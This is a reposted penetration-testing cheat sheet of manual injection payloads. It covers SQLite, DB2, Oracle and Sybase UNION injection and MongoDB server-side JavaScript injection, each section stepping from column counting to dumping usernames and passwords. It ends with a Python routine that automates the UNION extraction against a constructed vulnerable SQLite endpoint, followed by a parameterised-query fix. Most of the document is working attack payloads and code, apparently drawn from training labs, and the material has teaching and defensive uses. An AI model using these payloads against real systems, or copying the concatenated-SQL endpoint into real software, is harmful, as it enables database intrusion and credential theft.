[Penetration Testing] Common database injection statements


0x001 SQLite injection

Reference: https://www.cnblogs.com/xiaozi/p/5760321.html

Every SQLite database carries a system table named sqlite_master. It holds one row per table, index, view and trigger, with the object's name and, in the sql column, the CREATE statement that produced it, so one read of this table yields table names and their column definitions together.

order by 4
union select 1,2,3,4
union select 1,name,sql,4 from sqlite_master
union select 1,name,password,4 from WSTMart_reg

0x002 DB2 UNION injection

current schema: special register holding the current schema name (what the post calls the database name)
sysibm.sysdummy1: one-row dummy table (DB2's equivalent of Oracle's dual), used here only to SELECT the special register
syscat.tables: catalog view of tables; tabschema is its schema column and tabname its table-name column
sysibm.columns: catalog view of columns; table_schema, table_name and column_name are its schema, table and column-name columns
Caveats: DB2 stores unquoted identifiers in upper case, so catalog names are matched in upper case ('GAME_CHARACTER'); UNION branches must have compatible column types, so if the numeric placeholders error, put a string literal in the position that carries a character column; and the limit offset,count syntax below is MySQL-style, accepted only when the server is configured for MySQL compatibility, the portable form being fetch first 1 rows only (with offset n rows on newer releases).
1. Count the columns
order by 4
union select 1,2,3,4 from sysibm.systables
2. Get the database (schema) name:
union select 1,2,current schema,4 from sysibm.sysdummy1
3. Get table names, one row per request:
union select 1,2,tabname,4 from syscat.tables where tabschema=current schema limit 0,1
union select 1,2,tabname,4 from syscat.tables where tabschema=current schema limit 1,1
4. Get column names:
union select 1,2,column_name,4 from sysibm.columns where table_schema=current schema and table_name='GAME_CHARACTER' limit 0,1
5. Dump data:
union select 1,name,password,4 from GAME_CHARACTER limit 0,1
union select 1,name,password,4 from GAME_CHARACTER limit 1,1

0x003 Oracle UNION injection

Reference:

all_tables: tables the current user can access
user_tables: tables owned by the current user
all_tab_columns: columns of the tables the current user can access
user_tab_columns: columns of the tables owned by the current user
v$version: database version
Every Oracle SELECT needs a FROM clause, hence from dual, and UNION branches must match in column type, which is what the null/'null' probing in step 2 establishes. Unquoted identifiers are stored in upper case, so like '%user%' only matches tables created with a quoted lower-case name, which is why the table below is referenced as "sns_users".
1. Count the columns
order by 2
2. Find the column types the UNION needs (null vs a string literal per position)
union select null,null from dual
union select 'null',null from dual
union select 'null','null' from dual
3. Get table names (exclude names already seen, or search by pattern)
union select '1',(select table_name from user_tables where rownum=1) from dual
union select '1',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
union select '1',(select table_name from user_tables where rownum=1 and table_name like '%user%') from dual
4. Get column names
union select '1',(select column_name from user_tab_columns where rownum=1 and table_name='sns_users') from dual
union select '1',(select column_name from user_tab_columns where rownum=1 and table_name='sns_users' and column_name not in 'USER_NAME')  from dual
5. Read data from the chosen table and columns
union select user_name,user_pwd from "sns_users"
union select user_name,user_pwd from "sns_users" where user_name<>'hu'
union select user_name,user_pwd from "sns_users" where user_name='mozhe'

0x004 MongoDB closing-quote injection (server-side JavaScript)

The payloads in this section are for an endpoint that splices user input into server-side JavaScript, something of the shape db.<collection>.find({title:'<input>'}) inside a function whose returned object is rendered (the post does not show the exact statement; this is the shape the payloads imply). The leading '}) closes the string and the find() call, return ({title:..., content:' substitutes an attacker-chosen object for the real result, and the trailing 2 plus the application's own closing quote swallow the rest of the original statement. Whatever is placed in title is echoed back, so any shell expression can be evaluated and read out through it.

1. Find which field is echoed
'}); return ({title:1,content:'2

2. Database name
db is the database object, not a string; tojson() serializes it (in the mongo shell a DB object serializes to its name)
'}); return ({title:tojson(db),content:'2

3. Collection (table) names
db.getCollectionNames() returns an array, so it is passed through tojson() to get a string
'}); return ({title:tojson(db.getCollectionNames()),content:'2

4. Field names and data
db.Authority_confidential is the collection (table) in use; find() returns a cursor, [0] is its first document,
and tojson() of a document prints field names and values together, so one request reveals both the "columns" and the data
'}); return ({title:tojson(db.Authority_confidential.find()[0]),content:'1
'}); return ({title:tojson(db.Authority_confidential.find()[1]),content:'1

0x005 Sybase manual UNION injection

1. Count the columns
order by 4
2. Find the display positions
union all select 'null',null,null,null
union all select null,'null',null,null    (if the page shows 'null', position 2 is displayed)
union all select null,null,'null',null
union all select null,null,null,'null'
3. Database names (db_name() is the current database; db_name(n) looks one up by database id)
union all select null,db_name(),null,null
union all select null,db_name(1),null,null
union all select null,db_name(2),null,null
4. Table names (sysobjects also lists system objects; add and type='U' to see only user tables)
union all select null,name,null,null from mozhe_Deepthroat.dbo.sysobjects
union all select null,name,null,null from mozhe_Deepthroat.dbo.sysobjects where name<>'Deepthroat_login'
union all select null,name,null,null from mozhe_Deepthroat.dbo.sysobjects where name<>'Deepthroat_login' and name<>'notice'
5. Column names (object_id() resolves the table name to the id that syscolumns is keyed on)
union all select null,name,null,null from mozhe_Deepthroat.dbo.syscolumns where id=object_id('Deepthroat_login')
union all select null,name,null,null from mozhe_Deepthroat..syscolumns where id=object_id('Deepthroat_login') and name<>'id'
union all select null,name,null,null from mozhe_Deepthroat..syscolumns where id=object_id('Deepthroat_login') and name<>'id' and name<>'name'
6. Data, one row per request by excluding values already seen
union all select null,name,null,null from Deepthroat_login
union all select null,password,null,null from Deepthroat_login
union all select null,password,null,null from Deepthroat_login where name<>'zhang'
union all select null,password,null,null from Deepthroat_login where name='mozhe'
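The manual UNION workflow that sections 0x001, 0x002, 0x003 and 0x005 each perform by hand (count columns with ORDER BY, find a display position, then pull one catalog row or data row per request) written as one routine. This is an added example, not code from the original post or from the labs it references. It runs against an in-memory SQLite database because that needs no server: the news table, the rows in the WSTMart_reg table from 0x001, and the page() endpoint that concatenates the search term into SQL are all constructed here for the demonstration. The last function shows the bound-parameter fix.

```python
import re
import sqlite3

# Extracted values come back wrapped in [[ ]] so they can be picked out of
# the page regardless of which display position they landed in.
MARK = re.compile(r"\[\[(.*?)\]\]", re.S)


def build_db():
    """Constructed lab data (not from any real application): a four-column
    news table the page queries, plus the WSTMart_reg table from 0x001."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT, views INTEGER);
        INSERT INTO news VALUES (1, 'hello', 'first post', 10);
        CREATE TABLE WSTMart_reg(id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO WSTMart_reg VALUES (1, 'admin', 's3cret'), (2, 'mozhe', 'p@ss');
    """)
    return con


def page(con, user_input):
    """Hypothetical vulnerable endpoint: the search term is concatenated into
    the SQL and only title and body (positions 2 and 3) are rendered.
    Returns the rendered text, or None when the query errors (error page)."""
    sql = "SELECT id, title, body, views FROM news WHERE title = '%s'" % user_input
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error:
        return None
    return "\n".join("%s | %s" % (r[1], r[2]) for r in rows)


def count_columns(con, max_cols=32):
    """Step 1 ('order by N'): the first N that errors is one past the count."""
    for n in range(1, max_cols + 1):
        if page(con, "x' ORDER BY %d -- " % n) is None:
            return n - 1
    raise RuntimeError("more than %d columns" % max_cols)


def visible_slots(con, ncols):
    """Step 2: UNION a row of numbered markers; the ones echoed back are the
    display positions (what the null/'null' probing finds by hand)."""
    markers = ", ".join("'slot%d'" % i for i in range(1, ncols + 1))
    text = page(con, "x' UNION ALL SELECT %s -- " % markers) or ""
    return sorted(int(m) for m in re.findall(r"slot(\d+)", text))


def fetch_one(con, slot, ncols, expr, source, k):
    """Put expr in the visible slot, pad the rest, and take row k only: one
    value per request, the same idea as DB2 'limit k,1', Oracle
    'rownum=1 ... not in' and the Sybase 'name<>...' chains above."""
    cols = ["'x'"] * ncols
    cols[slot - 1] = "'[[' || ifnull((%s), '') || ']]'" % expr
    payload = "x' UNION ALL SELECT %s FROM %s LIMIT 1 OFFSET %d -- " % (
        ", ".join(cols), source, k)
    m = MARK.search(page(con, payload) or "")
    return m.group(1) if m else None


def enumerate_values(con, slot, ncols, expr, source, max_rows=100):
    """Walk the rows until a request comes back empty."""
    out = []
    for k in range(max_rows):
        v = fetch_one(con, slot, ncols, expr, source, k)
        if v is None:
            break
        out.append(v)
    return out


def dump(con):
    """Steps 1-5 end to end: column count, display slot, tables, schema, data."""
    ncols = count_columns(con)
    slot = visible_slots(con, ncols)[0]
    tables = enumerate_values(con, slot, ncols, "name",
                              "sqlite_master WHERE type = 'table'")
    # sqlite_master.sql holds the CREATE statement, so the column names come
    # for free (the 'union select 1,name,sql,4 from sqlite_master' payload).
    ddl = {t: fetch_one(con, slot, ncols, "sql",
                        "sqlite_master WHERE name = '%s'" % t, 0) for t in tables}
    creds = enumerate_values(con, slot, ncols, "name || ':' || password",
                             "WSTMart_reg")
    return {"columns": ncols, "slot": slot, "tables": tables,
            "ddl": ddl, "creds": creds}


def page_safe(con, title):
    """The fix: bind the value. The injected text is now just a title that
    matches nothing, so the same payload returns no rows instead of a dump."""
    rows = con.execute(
        "SELECT id, title, body, views FROM news WHERE title = ?", (title,)
    ).fetchall()
    return "\n".join("%s | %s" % (r[1], r[2]) for r in rows)


if __name__ == "__main__":
    db = build_db()
    print(dump(db))
    print(repr(page_safe(db, "x' UNION ALL SELECT 'a', 'b', 'c', 'd' -- ")))
```

To point the same routine at the other engines, swap the catalog source (syscat.tables, user_tables, sysobjects) and the row selector in fetch_one for the per-engine form shown in the sections above; on Oracle and DB2 the 'x' padding literals must also match the types of the columns the original query returns, which SQLite does not enforce.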


Reposted from blog.csdn.net/weixin_44032232/article/details/113953831